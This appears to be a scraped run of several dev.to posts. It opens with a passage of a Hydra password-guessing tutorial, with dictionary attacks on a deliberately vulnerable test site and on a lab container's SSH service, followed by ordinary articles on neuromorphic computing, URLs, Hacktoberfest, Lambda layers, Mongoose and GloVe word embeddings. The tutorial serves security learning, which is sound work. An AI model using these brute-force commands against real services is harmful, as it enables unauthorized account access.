This command creates a container named `pc01` and maps its port 22 to port 6050 on the host machine; it also drops us into a bash terminal inside the machine. From this point on we are working in the terminal of our `pc01` machine. If you want to access `pc01` again later, just type the command below:
```bash
#to exec into an already running container
docker exec -it pc01 /bin/bash
```
Done! Our machine is ready to launch the attack! In this case, we will attack the site `http://testphp.vulnweb.com/login.php` with the command below:
``` bash
hydra testphp.vulnweb.com http-form-post "/userinfo.php:uname=^USER^&pass=^PASS^:login page" -l test -p 0000 -t 10
```
Here we can see that hydra carries out the attack through an HTTP POST request, inserting the user value given by the `-l` flag and the password given by `-p` into the `USER` and `PASS` parameters of the target URL, respectively. This attack fails, because the password in the command above, `0000`, is not the correct one. Now let's build our own dictionary on `pc01`. Type the command below:
```bash
nano /tmp/pass.txt
```
The nano editor will open; fill it with a list of possible passwords:
```txt
0000
1234
4321
3434
4545
teste
nome
nada
```
Now let's run the command again, but this time with the password flag in uppercase (`-P`) pointing to our new file `/tmp/pass.txt`:
``` bash
hydra testphp.vulnweb.com http-form-post "/userinfo.php:uname=^USER^&pass=^PASS^:login page" -l test -P /tmp/pass.txt -t 10
```
This time hydra will go through the entire `/tmp/pass.txt` file looking for the correct password. That is how a dictionary attack works. This time the attack will succeed, because the correct password, `teste`, is in our dictionary.
# Attacking one machine from another via SSH
Now let's create a new machine, `pc02`, similar to what we did with `pc01`:
```bash
docker run --name pc02 -p 6051:22 -i -t cancitoo/kali-linux-ssh-hydra bash
#to exec into an already running container
docker exec -it pc02 /bin/bash
```
Notice that this time port 22 is mapped to port 6051 on the host. Let's add a layer of security to `pc02`. By default the container comes with no password; to set the root password on `pc02`, just type the command below and follow the instructions:
```bash
#to set a password for root
passwd
```
Agora vamos configurar o ssh na máquina `pc02`. Isso vai permitir conexão ssh de `pc01` para `pc02`:
```bash
#generate the host keys for remote access
ssh-keygen -A
#start the SSH service
service ssh start
```
Back on `pc01`, let's add the password we created on `pc02` to our dictionary and create a second dictionary with logins:
```bash
# Update the dictionary with the password
nano /tmp/pass.txt
# create a list of possible users
nano /tmp/users.txt
```
Here is an example for `/tmp/users.txt`:
```txt
pedro
carlo
root
admin
```
But we still need to find out the IP of `pc02`; to do that, run the command below in a separate terminal:
```bash
docker inspect -f "{{ .NetworkSettings.IPAddress }}" pc02
```
Let's pretend the answer was `172.17.0.2`. Now we just need to run hydra against the target:
```bash
hydra -L /tmp/users.txt -P /tmp/pass.txt 172.17.0.2 ssh
``` | cancio |
1,660,118 | Neuromorphic Computing: A Comprehensive Guide | Introduction Neuromorphic computing is an intriguing and fast expanding area that... | 0 | 2023-11-08T04:06:57 | https://dev.to/adityapratapbh1/neuromorphic-computing-a-comprehensive-guide-1885 | computing, neuromorphic |
[](https://cloudnativejourney.files.wordpress.com/2023/11/pexels-photo-1714208.jpeg?w=1024 "Computing")
Introduction
------------
Neuromorphic computing is an intriguing and fast-expanding field that creates brain-like computer systems by drawing inspiration from the human brain. In this article, we will look at the basics of neuromorphic computing, its components, and its applications in artificial intelligence and computing.
Neuromorphic Computing Basics
-----------------------------
### Terminology
Before we delve into the structure of neuromorphic computing, let's familiarize ourselves with some key terminology:
* **Neuromorphic Hardware**: Specialized hardware designed to mimic the behavior of biological neural systems.
* **Neurons**: Fundamental units of computation that process and transmit information in neuromorphic systems.
* **Synapses**: Connections between neurons that enable information transmission and learning.
* **Spiking Neural Networks (SNNs)**: Neural network models that use spikes or pulses for information representation and processing.
* **Event-Driven Processing**: Processing of data based on events or spikes, leading to low power consumption.
### System Structure
Neuromorphic computing systems are structured to emulate the biological brain's neural networks and synapses. The key components include:
* **Neuromorphic Hardware**: Specialized chips or hardware platforms designed to run SNNs efficiently.
* **Neurons and Synapses**: Emulated neurons and synapses that process information in an event-driven manner.
* **Software Frameworks**: Tools and frameworks for designing and simulating SNNs.
* **Applications**: Use cases in artificial intelligence, robotics, and neuroscience research.
Neuromorphic Computing Development
----------------------------------
### Hardware Advancements
Advancements in neuromorphic hardware have been a driving force behind the field's progress. Specialized chips and platforms designed for efficient SNN execution have emerged, allowing for real-time event-driven processing.
### Spiking Neural Networks (SNNs)
Spiking neural networks are the primary models used in neuromorphic computing. They use spikes or pulses to represent and transmit information, similar to the electrical impulses in biological neurons. SNNs are well-suited for event-driven processing and offer advantages in terms of power efficiency.
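To make the spiking idea concrete, here is a minimal sketch of a leaky integrate-and-fire neuron, the building block most SNN models start from (parameters are illustrative, not tied to any specific chip):

```python
import numpy as np

# Illustrative leaky integrate-and-fire neuron: integrate input, leak over time,
# and emit a spike (an "event") whenever the membrane potential crosses a threshold.
def simulate_lif(input_current, threshold=1.0, leak=0.9):
    v = 0.0
    spike_times = []
    for t, current in enumerate(input_current):
        v = leak * v + current          # leaky integration of the input
        if v >= threshold:
            spike_times.append(t)       # the neuron "fires"
            v = 0.0                     # reset after the spike
    return spike_times

rng = np.random.default_rng(0)
print(simulate_lif(rng.uniform(0, 0.3, size=100)))  # times at which spikes occur
```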
### Software Frameworks
Various software frameworks and tools have been developed to facilitate the design and simulation of SNNs. These frameworks enable researchers and developers to experiment with neuromorphic models and applications.
Applications of Neuromorphic Computing
--------------------------------------
Neuromorphic computing has found applications in diverse fields, including:
* **Artificial Intelligence**: Neuromorphic computing is used to develop energy-efficient AI systems for tasks like image and speech recognition.
* **Robotics**: Neuromorphic hardware and algorithms enable robots to process sensory information in real time and perform complex tasks efficiently.
* **Neuroscience Research**: Neuromorphic systems are employed to better understand the brain's neural processes and behaviors.
Advantages and Challenges
-------------------------
### Advantages of Neuromorphic Computing
* **Energy Efficiency**: Event-driven processing and low power consumption make neuromorphic computing suitable for edge and mobile devices.
* **Real-time Processing**: Neuromorphic systems can process data in real time, enabling responsive AI and robotics applications.
* **Biologically Inspired**: Neuromorphic computing draws inspiration from the human brain, leading to more brain-like computing systems.
### Challenges of Neuromorphic Computing
* **Complexity**: Designing and programming SNNs can be challenging due to their complex spiking behavior.
* **Hardware Development**: Developing efficient neuromorphic hardware is a costly and specialized endeavor.
* **Integration**: Integrating neuromorphic systems with existing AI and computing infrastructure can be complex.
Conclusion
----------
Neuromorphic computing is an exciting and creative field that applies principles of the human brain to build energy-efficient, real-time computing devices. Its applications in artificial intelligence, robotics, and neuroscience research are changing how we approach complicated tasks and data processing. While there are challenges, the future of neuromorphic computing holds immense promise for advancing technology and our understanding of the brain's computational principles. | adityapratapbh1 |
1,660,199 | Understanding parts of URL | Understanding parts of an URL In the context of web development, the URL path refers to... | 0 | 2023-11-08T05:31:52 | https://dev.to/tanmaycode/understanding-parts-of-url-1n1g | webdev, javascript, programming, beginners | ### Understanding the parts of a URL
In web development, a URL is made up of several components that appear before and after the domain name. These components provide additional information to the server or specify particular resources or actions. Here are the common parts of a URL:
1. **Protocol:**
- The protocol specifies the communication protocol being used. Common examples include HTTP, HTTPS, FTP, and more.
- Example: `https://www.example.com`
2. **Domain Name:**
- The domain name identifies the specific web domain being accessed. It represents the unique address of the website or web application.
- Example: `https://www.example.com`
3. **Port:**
- The port number is used to identify a specific process or application on a server. It is often included in the URL to specify the destination port for the communication.
- Example: `https://www.example.com:8080`
4. **Path:**
- The path specifies the specific resource or location within the web server. It follows the domain name and may include one or more path segments separated by slashes.
- Example: `https://www.example.com/products/electronics`
5. **Query Parameters:**
- Query parameters provide additional data to the server and are appended to the URL after a question mark. They consist of key-value pairs separated by ampersands.
- Example: `https://www.example.com/search?q=keyword&page=1`
6. **Anchor or Fragment Identifier:**
- The anchor or fragment identifier is used to identify a specific location within a web page. It is indicated by a hash symbol followed by the anchor name.
- Example: `https://www.example.com/about#section2`
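Putting it all together, JavaScript's built-in `URL` API can extract each of these parts:

```javascript
// Pulling each part out of a URL with the built-in URL API.
const url = new URL("https://www.example.com:8080/products/electronics?q=keyword&page=1#section2");

console.log(url.protocol);                // "https:"
console.log(url.hostname);                // "www.example.com"
console.log(url.port);                    // "8080"
console.log(url.pathname);                // "/products/electronics"
console.log(url.searchParams.get("q"));   // "keyword"
console.log(url.hash);                    // "#section2"
```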
Understanding these different parameters in the URL path is essential for handling various types of requests, parsing the incoming data, and directing the user to the appropriate resources or actions on the server-side application. | tanmaycode |
1,660,301 | @iaminebriki at Hacktoberfest ✨ | This year was first time I participate to Hacktoberfest and It's been such a nice experience! ... | 0 | 2023-11-08T07:32:19 | https://dev.to/iaminebriki/iaminebriki-at-hacktoberfest-11i1 | hack23contributor, hacktoberfest23, hacktoberfest, opensource | This year was the first time I participated in Hacktoberfest, and it's been such a nice experience!
### Intro
I am a Machine learning Engineer and freelancer interested in the intersection of AI and Healthcare (Medical Imaging specifically).
I've been interested in open source for a while now but didn't know exactly where I could fit in; Hacktoberfest seems to have introduced me x) ✨
You can check me out on Github at [@iaminebriki](https://github.com/iaminebriki)
### Highs and Lows
As little as I contributed to this project, it was great to join [@Numpy](https://github.com/numpy/numpy) as a contributor after fixing their official SVG logo files, which weren't rendering their colors correctly in Figma. It feels great to take part in such a foundational library in Python, dedicated to scientific computing and used by millions around the world ✨
My PR: [DOC: correct Logo SVG files rendered in dark by Figma](https://github.com/numpy/numpy/pull/24975)
I have also worked on some other projects:
In [free-programming-books](https://github.com/EbookFoundation/free-programming-books), a great repo collecting free programming books from all over the web, in many languages, sorted by subject and by programming language, I added some free e-books too.
=>[Added 3 'Notes for Professionals' books](https://github.com/EbookFoundation/free-programming-books/pull/10884)
I've also designed some logos with Figma for [skill-icons](https://github.com/iaminebriki/skill-icons), which you can use in your GitHub profile README.
=> [Updated/added 26 logos (with Light and Dark themes) designed with official materials](https://github.com/tandpfun/skill-icons/pull/575)
Also found a nice initiative project [Data-Science-Flashcards](https://github.com/klaus78/Data-Science-Flashcards) which is a [website](https://klaus78.github.io/Data-Science-Flashcards) for Flashcards in Data Science, Machine Learning, Deep Learning and more for people to catch-up or to get to know these fields.
=> [My contributions](https://github.com/klaus78/Data-Science-Flashcards/commits?author=iaminebriki)
### Growth
Hacktoberfest 2023 was a great chance to hit some Git commands on the Terminal x)
I've learned not only to push code but also to communicate: raising issues to suggest features and discuss changes. I also learned to document my work, follow contribution guidelines, and resolve GitHub Actions conflicts ✨
So thank you #hacktoberfest for giving us the motive to leave some touch in the Open-source community, I'm looking forward to some more serious contributions to some great repos out there ✨
Shoutout to [Tree Nation](https://tree-nation.com/about-us) for offering to plant a tree on my behalf as part of their mission to offset CO2 emissions.
Check out [my "Markhamia lutea" Tree](https://tree-nation.com/trees/view/5280633) in Northeast Tanzania, which will offset 7.00 kg of CO2 every year for about 150 years (Markhamia lutea's average lifetime) :D
 | iaminebriki |
1,660,464 | Why is WordPress Popular? | WordPress is a popular and widely-used Content Management System (CMS) for several reasons that... | 0 | 2023-11-08T11:12:18 | https://dev.to/pogo_themes/why-is-wordpress-popular-3jl9 | wordpress, seo, cms, beginners | WordPress is a popular and widely-used Content Management System (CMS) for several reasons that contribute to its reputation as one of the best CMS options. However, it's important to note that what makes WordPress the "best" CMS can be subjective and depends on your specific needs and preferences.
Here are some of the key reasons why WordPress is often considered a top choice:
**User-Friendly:**
WordPress is known for its ease of use. It has a straightforward and intuitive interface that allows users with varying levels of technical expertise to create and manage websites.
**Extensive Community and Support:**
WordPress has a vast and active user community, which means you can find a wealth of tutorials, forums, and documentation to help you address any issues or questions you may encounter.
**Customizability:**
WordPress offers a wide range of themes and plugins that enable you to customize your website's design and functionality. You can find both free and premium options to suit your specific needs.
**SEO-Friendly:**
WordPress is designed with search engine optimization (SEO) in mind, and there are numerous plugins available (e.g., Yoast SEO) to help you optimize your website's content for search engines.
**Responsive Design:**
Many WordPress themes are built to be mobile-responsive, ensuring that your website looks and functions well on various devices, including smartphones and tablets.
**Security:**
WordPress takes security seriously and regularly releases updates to address vulnerabilities. Additionally, there are security plugins available to enhance your site's protection.
**Content Management:**
WordPress excels at managing and organizing content. It allows you to create and publish posts, pages, and multimedia content with ease.
**Scalability:**
WordPress can be used to build anything from simple blogs to complex, large-scale websites. It is a versatile platform that can grow with your evolving needs.
**Community and Developer Ecosystem:**
WordPress has a vast and active community of developers and designers, making it easier to find experts for custom development and design work if needed.
**Cost-Effective:**
WordPress is open-source software, which means it's free to use. While there may be costs associated with premium themes, plugins, hosting, and other services, it can be a cost-effective choice for many users.
**Multilingual Support:**
WordPress supports multiple languages, making it accessible to a global audience.
Despite these advantages, it's important to recognize that no CMS is universally perfect for everyone. Your choice of a CMS should depend on your specific requirements, such as the type of website you're building, your technical proficiency, and your budget.
You may also want to read about [why WordPress sucks](https://pogothemes.com/why-wordpress-sucks/).
Different CMS options, such as Joomla, Drupal, and Wix, may be better suited to different use cases, so it's essential to evaluate your needs and compare various platforms before making a decision.
## Some statistics to give you an idea of how popular WordPress is
**Market Share:**
According to W3Techs, as of January 2022, WordPress was used by approximately 41% of all websites on the internet. This includes both small personal blogs and major websites of Fortune 500 companies and major news outlets.
**Content Management System Usage:**
WordPress dominates the CMS market. It was used by around 64% of all websites that used a CMS. Joomla and Drupal, other popular CMSs, had a much smaller market share in comparison.
**Global User Base:**
WordPress has a global user base, with millions of users and developers around the world. It is available in over 200 languages, making it accessible to a diverse range of people.
**Plugin and Theme Ecosystem:**
The WordPress ecosystem includes over 58,000 plugins and thousands of themes in the official WordPress.org repository. This vast library of resources highlights the popularity of the platform.
**Community and Events:**
WordPress has a thriving community, with numerous WordCamps and WordPress Meetups happening globally. These events attract thousands of attendees, showcasing the enthusiasm and popularity of the platform.
**Major Websites and Brands:**
Many well-known brands and major websites use WordPress, including The New Yorker, BBC America, TechCrunch, and The White House, among many others.
## Why WordPress is the best platform for SEO?
WordPress is often considered an excellent platform for search engine optimization (SEO) due to several factors that contribute to its SEO-friendliness. While it may not be the absolute best platform for every SEO scenario, it offers numerous advantages in this regard:
**SEO-Friendly Architecture:**
WordPress is built with clean and well-structured code, which search engines prefer. It generates SEO-friendly URLs and allows you to customize and optimize these URLs for better search engine visibility.
**SEO Plugins:**
WordPress offers a variety of powerful SEO plugins, with Yoast SEO and All in One SEO Pack being two of the most popular ones. These plugins provide tools for on-page SEO, meta tags, sitemaps, and more.
**Content Management:**
WordPress makes it easy to create and manage content, which is a fundamental aspect of SEO. You can easily publish and organize text, images, videos, and other content types, allowing you to create high-quality, SEO-optimized content.
**Mobile Responsiveness:**
Many WordPress themes are designed to be mobile-responsive, ensuring that your website is well-optimized for mobile users, which is increasingly important for SEO since search engines consider mobile-friendliness in rankings.
**Speed and Performance:**
WordPress allows you to optimize your site's speed and performance, which is crucial for SEO. You can use caching plugins, optimize images, and choose a reliable hosting provider to ensure fast page loading times.
**Regular Updates:**
WordPress regularly releases updates to improve security, fix bugs, and enhance performance. Keeping your WordPress installation and plugins up-to-date helps maintain a secure and well-performing website, which is a positive signal for SEO.
**User-Friendly Design:**
WordPress's user-friendly interface means you can quickly implement SEO best practices without needing extensive technical knowledge. This accessibility is useful for small business owners, bloggers, and anyone who wants to manage their site's SEO.
**Community and Resources:**
WordPress has a vast and active community, which means you can find plenty of tutorials, forums, and documentation to help you with SEO-related questions and challenges.
While WordPress offers many advantages for SEO, it's essential to note that SEO success also depends on the quality of your content, keyword research, backlinks, and other off-page factors. WordPress can help you with on-page SEO, but you'll still need to focus on other SEO aspects to achieve the best results.
Additionally, the "best" platform for SEO can vary depending on your specific needs and preferences, so it's important to choose the platform that aligns with your goals and expertise.
Check out PogoThemes for [Free WordPress Themes](https://pogothemes.com/). | pogo_themes |
1,660,661 | Stop using Lambda Layers (use this instead) | This post is also available on YouTube: Lambda layers are a special packaging mechanism provided... | 0 | 2023-11-08T13:38:26 | https://aaronstuyvenberg.com/posts/why-you-should-not-use-lambda-layers | aws, lambda, webdev, programming | This post is also available on YouTube:
{% embed https://www.youtube.com/embed/Y4EJPIpqmuk?si=tzscV5es_MaXigPs %}
[Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html) are a special packaging mechanism provided by AWS Lambda to manage dependencies for zip-based Lambda functions. Layers themselves are nothing more than a _sparkling_ zip file, but they have a few interesting properties which prove useful in some cases. Unfortunately Lambda layers are also difficult to work with as a developer, tricky to deploy safely, and typically don't offer benefits over native package managers. These downsides frequently outweigh the upsides, and we'll examine both in detail.
By the end of this post, you'll understand the pitfalls of general Lambda layer use as well as the niche cases where layers may make sense.
## Busting Lambda layer Myths
When I ask developers why they are using Lambda layers I often learn the underlying reasons are misguided. It's not their fault entirely, the [documentation](https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html) makes some imprecise claims which may perpetuate these myths.
### Lambda layers do not circumvent the 250mb size limit
I frequently hear folks say they are leveraging Lambda layers to "raise the 250mb limit placed on zip-based Lambda functions". That's simply *not true*. The size of the unzipped function *and all attached layers* [must be less than 250mb](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-limits.html).
This misunderstanding springs from the very first point in the documentation which states that Lambda layers "reduce the size of your deployment packages". While technically it is true that the specific *function code* you deploy can be reduced with layers, the overall size of the function when it runs in Lambda does not change.
This leads me to my next point.
### Lambda layers do not improve or reduce cold start initialization duration
Developers often mistake that a "reduced deployment package" size will reduce cold start latency. This is also untrue, as we already know that the [code you load](https://twitter.com/astuyve/status/1716125268060860768) is the single largest contributor to cold start latency. Whether or not these bytes come from a layer or simply the function zip itself is irrelevant to the resulting initialization duration.
## Development pain with Layers
One of the biggest challenges for developers leveraging Lambda layers is that they appear `magically` when a handler executes. While that feat is impressive technically, it poses an issue for developers as text editors and IDEs expect dependencies to be locally available, as do bundlers, test runners, and lint tools. If you run your function code locally or use an emulator, only a subset of those tools cooperate with layers. Although solving these issues is possible, external dependencies provided by Lambda layers require special consideration and handling for limited benefit.
Often, the process of building and deploying Layers separately is enough to avoid them, but there are other reasons to avoid Lambda layers.
## Cross-architecture woes
We're writing software for a world which is increasingly powered by ARM chips. It may be your shiny new M3 laptop, or Amazon's own (admittedly excellent) [Graviton](https://aws.amazon.com/blogs/aws/aws-lambda-functions-powered-by-aws-graviton2-processor-run-your-functions-on-arm-and-get-up-to-34-better-price-performance/) processor. Your Lambda functions are likely running on x86 or a combination of ARM and x86 processors today.
Lambda layers *do* support metadata attributes called "supported runtimes" and "supported architectures", but these are merely _labels_. They don't prevent or enforce any runtime or deployment time compatibility. Imagine your surprise when you attach a binary compiled for x86 to your arm-based Lambda function and receive `exec format` errors!
[I demonstrated this failure live](https://youtu.be/LrenCkwFhZs?t=4917)
## Deployment difficulties
Lambda layers do not support semantic versioning. Instead, they are immutable and versioned incrementally. While this does help prevent unintentional upgrading, incremental versioning offers no clues as to backwards compatibility or changes in the updated layer package. Additionally, Lambda layers are completely runtime agnostic and offer no manifest, lockfile, or packaging hints. Layers don't provide a `package.json`, `pyproject.toml`, or `gemspec` file to ensure adequate dependency resolution. Instead it's incumbent on the authors to only package compatible code.
One of the main selling points of Lambda layers is that they can share common dependencies between many functions, which is great if every function requires exactly the same compatible version of a dependency. But what happens when you want to upgrade a major version?
You'll need to release a new version of the layer with the new major version, ensure that no developer accidentally applies the incrementally-adjusted layer (remember – no semantic versioning, manifest files, or lockfiles!), and then simultaneously upgrade the Lambda function code and layer at the same time.
But even _that_ doesn't work out automatically, as I've [already documented](https://aaronstuyvenberg.com/posts/lambda-arch-switch). Deploying a function + layer results in two separate, asynchronous API calls. `updateFunction` updates the function *code* while `updateFunctionConfiguration` updates the *configured layers*, and both of these are *separate* control plane operations which can happen in parallel. This means that invoking `$LATEST` will fail until both calls complete. To avoid this you'll need to create a new function _version_, apply the new layer, and then update your integration (eg: ApiGateway) to point to the new alias, after both steps are complete.
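To make the race concrete, here's a sketch of the two separate control plane calls behind such a deploy (function name and layer ARN are placeholders):

```bash
# Two independent, asynchronous control plane operations:
aws lambda update-function-code \
  --function-name my-fn \
  --zip-file fileb://function.zip

aws lambda update-function-configuration \
  --function-name my-fn \
  --layers arn:aws:lambda:us-east-1:123456789012:layer:my-layer:2

# Until BOTH complete, $LATEST can mix new code with the old layer (or vice versa).
```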
Now semantic versioning is not perfect, and flexible specification (eg: `~` or `^` for relative versions) means that the combination of bits executing your Lambda function may run together for the very first time in a staging or production environment. This has caused enough issues that package managers have solutions like `npm shrinkwrap`, but this can be even worse with Lambda layers.
And that's the gist of my point – this is what your package manager should be doing.
## Dependency collisions
Lambda layers can cause a particular nasty bug and it stems from how Lambda creates a filesystem from your deployment artifacts. If you've followed this blog, you know that [zip archives themselves](https://aaronstuyvenberg.com/posts/impossible-assumptions) can already create interesting edge cases when unpacking a zip file onto a file system, and Lambda is not immune to that. When a Lambda function sandbox is created, the main function package is copied into the sandbox and then each layer is copied [in order](https://docs.aws.amazon.com/lambda/latest/dg/adding-layers.html) into the same filesystem directory. This means that layers containing files with the same path and filename are squashed.
Although Lambda handler code is copied into a different directory than layer code, the runtime will decide where to look *first* for dependencies. This is typically handled by the order of directories listed in the `PATH` environment variable, or the runtime-specific variant like `NODE_PATH`, Ruby's `GEM_PATH`, or Java's `CLASS_PATH` as [documented here](https://docs.aws.amazon.com/lambda/latest/dg/packaging-layers.html).
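For Node.js, that looks roughly like this (layer contents unpack under `/opt`, function code under `/var/task`):

```bash
# Dependencies shipped in a layer land here:
ls /opt/nodejs/node_modules
# Dependencies bundled in the function zip land here:
ls /var/task/node_modules
# NODE_PATH determines which copy of a shared dependency the runtime loads first.
```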
Consider a Lambda function and two layers which all depend on different versions of the same library. Layers don't provide lockfiles or content metadata, so as a developer you may not be aware of this dependency conflict at build time or deployment time.

At runtime, the layer code and function code are copied to their respective directories, but when the handler begins processing a request; it crashes with a syntax error! But your code ran fine locally?! What happened?
The code and dependencies in the Lambda layer expect to have access to version 2 of library ABC, but the runtime has already loaded version 1 of library ABC from the function zip file!

If this seems farfetched, it can happen to you – because it [happened to me](https://github.com/DataDog/serverless-plugin-datadog/issues/321#issuecomment-1349044506).
## What Lambda layers can do for you
### Lambda layers _can_ improve function deployment speeds (but so can your CI pipeline)
Consider two Lambda functions of identical dependencies, one with using layers (A), and one without (B).
It's true that you can expect relatively shorter deployments for A, if you aren't also modifying and deploying the associated layer(s). However the vast majority of CI/CD pipelines support dependency caching, so most users have clear paths towards fast deployments regardless of their use of layers. Yes, your CloudFormation deployment will be a bit longer but ultimately there is not a distinct advantage here.
### Lambda layers can share code across functions
Within the same region, one layer can be used across different Lambda functions. This admittedly can be super useful to share libraries for authentication or other cross-functional dependencies. This is especially useful if you (like me) need to [share layers](https://github.com/datadog/datadog-lambda-extension) for other users, even publicly.
I don't really agree with the other two points in the [documentation](https://docs.aws.amazon.com/lambda/latest/dg/chapter-layers.html). Layers may "separate core function logic from dependencies", but only as much as putting that dependency in another file and `import`ing it. Your runtime does this already so this point falls a bit flat.
Finally, I don't think it's best to edit your production Lambda function code live in the console editor, and I _especially_ don't think you should modify your software development process to support this. (Cloud9 IDE is a good product, just don't use the version in the Lambda console.)
## Where you should use Lambda layers
Lambda layers aren't all bad, they're a tool with some sharp edges (which AWS should fix!). There are a couple exceptions which you can and should use Lambda layers.
- Shared binaries
If you have a commonly used binary like `ffmpeg` or `sharp`, it may be easier to compile those projects once and deploy them as a layer. It's handy to share them across functions, and this specific layer will rarely need to be rebuilt and updated. Layers are best with established binaries containing solid API contracts, so you won't need to deal with the deployment difficulties I listed earlier pertaining to major version upgrades.
- Custom runtimes
The immensely popular [Bref](https://bref.sh/docs/runtimes#aws-lambda-layers) PHP runtime is available as a Layer. Bref is available precompiled for both arm and x86, so it can make sense to use as a layer. The same is true for the [Bun](https://bun.sh) javascript runtime. That being said - container images have become [far more performant](https://twitter.com/astuyve/status/1715789135804354734) recently and are worth reconsidering, but that's a subject for another post.
- Lambda Extensions
Extensions are a special type of Layer but have access to extra lifecycle events, async work, and post processing which regular Lambda handlers cannot access. Extensions can perform work asynchronously from the main handler function, and can execute code _after_ the handler has returned a result to the caller. This makes Lambda Extensions a worthwhile exception to the above risks, especially if they are also pre-compiled, statically linked binary executables which won't suffer from dependency collisions.
## Wrapping up
In specific cases it can be worthwhile to use Lambda layers. Specifically for Lambda extensions, or heavy compiled binaries. However Lambda layers should not replace the runtime-specific packaging and ecosystem you already have. Layers don't offer semantic versioning, make breaking changes difficult to synchronize, cause headaches during development, and leave your software susceptible to dependency collisions.
If or when AWS offered semantic versioning, support for layer lockfiles, and integration with native package managers, I'll happily reconsider these thoughts.
Use your package manager wherever you can, it's a more capable tool and already solves these issues for you.
If you like this type of content, please subscribe to my [blog](https://aaronstuyvenberg.com) or reach out on [twitter](https://twitter.com/astuyve) with any questions. You can also ask me questions directly if I'm [streaming on Twitch](https://twitch.tv/aj_stuyvenberg) or [YouTube](https://www.youtube.com/channel/UCsWwWCit5Y_dqRxEFizYulw). | astuyve |
1,673,201 | Day 21 OOPS | I spent the day studying OOPS. | 0 | 2023-11-21T06:29:09 | https://dev.to/harshaart/day-21-oops-95e | I spent the day studying OOPS. | harshaart | |
1,660,923 | Angular @for | Angular has released the new '@IF' block syntax similar to Javascript How does this... | 0 | 2023-11-08T17:30:28 | https://dev.to/dionisd/angular-for-ad4 | angular, angular17, typescript | ## Angular has released the new '@for' block syntax, similar to JavaScript
How does this work?
`@for`
> Similar to JavaScript’s `for...of` loops, Angular provides the `@for` block for rendering repeated elements.


You might've noticed that there's additional `track` keyword.
`track` property
_Why?_
> Angular needs to track each element through any reordering, usually by treating a property of the item as a unique identifier or key (Items can later change or move).

[Angular docs](https://angular.dev/essentials/conditionals-and-loops) | dionisd |
1,660,932 | i am facing an error while integrating mongoose with elysia | error looks like this : MongooseServerSelectionError: 1 | (function (...args) { super(...args); })... | 0 | 2023-11-08T17:49:53 | https://dev.to/jayakantharun/i-am-facing-an-error-while-integrating-mongoose-with-elysia-3oj4 | bunjs, elysia | error looks like this :
```
MongooseServerSelectionError:
1 | (function (...args) { super(...args); })
                          ^
MongooseServerSelectionError: Failed to connect
 code: "undefined"
      at new MongooseError (:1:32)
      at new MongooseServerSelectionError (:1:32)
      at _handleConnectionErrors (/home/jka_583/Projects/bun_project_1/backend/node_modules/mongoose/lib/connection.js:805:10)
      at /home/jka_583/Projects/bun_project_1/backend/node_modules/mongoose/lib/connection.js:780:10
      at processTicksAndRejections (:61:76)
```
Can anyone help me find a solution to this issue? | jayakantharun |
1,661,046 | Cracking the Code: Understanding and Developing the NLP Core of Contexto.me Using GloVe Technique | What is contexto.me game? Contexto.me game play Contexto.me is a compelling linguistic... | 0 | 2023-11-08T21:21:58 | https://dev.to/estevesegura/cracking-the-code-understanding-and-developing-the-nlp-core-of-contextome-using-glove-technique-40oi | ## What is contexto.me game?

*Contexto.me gameplay*

**Contexto.me** is a compelling linguistic game, taking inspiration from **Semantle.com**, that harnesses the power of semantic distances in language. The objective is simple yet captivating: **players must discern a hidden word, with the game providing feedback on the ‘distance’ between the words the players input and the target answer.**
This ‘distance’ refers not to any physical measurement, **but to the semantic gap between words, as determined by their use and relatedness in natural language.**
## How Machines Learn the Semantic Distance Between Words: A Simple Explanation
Imagine teaching a computer to understand language like we do. To make this possible, the computer needs to see words not as individual letters or sounds, but as points in a vast space based on their meanings and uses. **This is what we call ‘semantic distance’: words used similarly are closer**, unrelated words are farther apart.
**First, the machine scans a massive amount of text**. It’s like a detective,** noticing how often and where each word appears**. This part of the process will be beautifully shown in our animation.
Next, the machine starts placing these words in the ‘semantic space’.** At first, words are scattered randomly. As the machine learns from the text, it moves similar words closer together**. This is like a dance of words settling into their right places, which our animation will also illustrate.
The magic behind all this? A technique called **GloVe (Global Vectors for Word Representation)**. GloVe observes how words interact and uses this to create the semantic space. This is how **Contexto.me can tell you how ‘close’ your word is to the target word**, making each game a journey through language.

## Transforming Words into Vectors: Mathematical Operations Made Possible
_Wait are you telling me that I can add words? or multiply words? …. Yes_
One of the fascinating aspects of converting words into vectors, or numerical representations, **is that we can perform mathematical operations on them, much like we would with traditional numbers**. Let’s explore this using familiar examples.
Consider the words **‘woman’** and **‘crown’**. In our semantic space, each word is represented as a vector — a point with a specific direction. **When we add the vectors for ‘woman’ and ‘crown’, the result aligns closely with the vector for ‘queen’**. This is because, in our language usage, the combination of a ‘woman’ with a ‘crown’ often relates to the concept of a ‘queen’.
Taking it one step further, **if we add ‘queen’ and ‘land’, we move towards the vector for ‘kingdom’**. This is because a **‘queen’** associated with **‘land’** frequently signifies a **‘kingdom’**.

In **Contexto.me**, these concepts form the foundation for gameplay. **The primary operation it performs isn’t addition, but distance calculation**. It assesses the **‘distance’ or difference** between the vector for the player’s input word and the target word. By understanding these distances, players can navigate the semantic space, using their linguistic knowledge and insights to reach the target word.

## The Magic of GloVe: A Friendly Guide to Understanding Its Python Implementation
The Python script shared here illustrates how the **GloVe (Global Vectors for Word Representation)** technique can be implemented. Let’s dissect it into key parts to understand the entire process better.
```python
import os
import numpy as np
from scipy.sparse import lil_matrix
from sklearn.preprocessing import normalize
from sklearn.decomposition import TruncatedSVD
from sklearn.metrics.pairwise import cosine_similarity
```
The script begins by importing the necessary Python libraries. These include ‘os’ for handling file paths, **‘numpy’** for numerical operations, ‘lil_matrix’ from ‘**scipy.sparse’** for creating a matrix, **‘TruncatedSVD’** from **‘sklearn.decomposition’** for singular value decomposition (SVD), and ‘cosine_similarity’ from **‘sklearn.metrics.pairwise’** to calculate the similarity between word vectors.
```python
def create_co_occurrence_matrix(corpus, window_size=4):
```
This function constructs a **co-occurrence matrix**, which is essential in GloVe. It records how often each word (row) occurs with every other word (column). The **‘window_size’** parameter sets the number of words to the left and right of a given word considered as its context.
```python
def perform_svd(matrix, n_components=300):
```
This function applies **Singular Value Decomposition (SVD)** on the co-occurrence matrix to reduce its dimensionality while preserving its most important semantic features. The **‘n_components’** parameter sets the number of dimensions for the output vectors.
```python
def create_word_embeddings(corpus):
```
**This function calls the previous two functions to create the word embeddings**. It generates the co-occurrence matrix and then applies **SVD** to create the final word vectors or **‘embeddings’**.
```python
